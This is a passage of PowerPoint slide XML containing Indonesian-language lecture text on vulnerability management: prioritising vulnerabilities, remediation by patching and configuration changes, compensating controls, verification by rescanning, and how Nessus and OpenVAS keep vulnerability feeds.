            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor-faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerusakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akibat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berhasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lanskap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memprioritaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>upaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>remediasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kritis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dahulu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Remediasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risikonya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Teknik </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mitigasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> patch, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperbarui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengganti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>remediasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompensasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alternatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Verifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>upaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>remediasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berhasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketahanannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menganalisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memulihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hati-hati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Paparan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Umum</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemindai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperbarui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digambarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Nessus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> plug-in, dan OpenVAS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebutnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (NVT). Sering kali, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komersial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
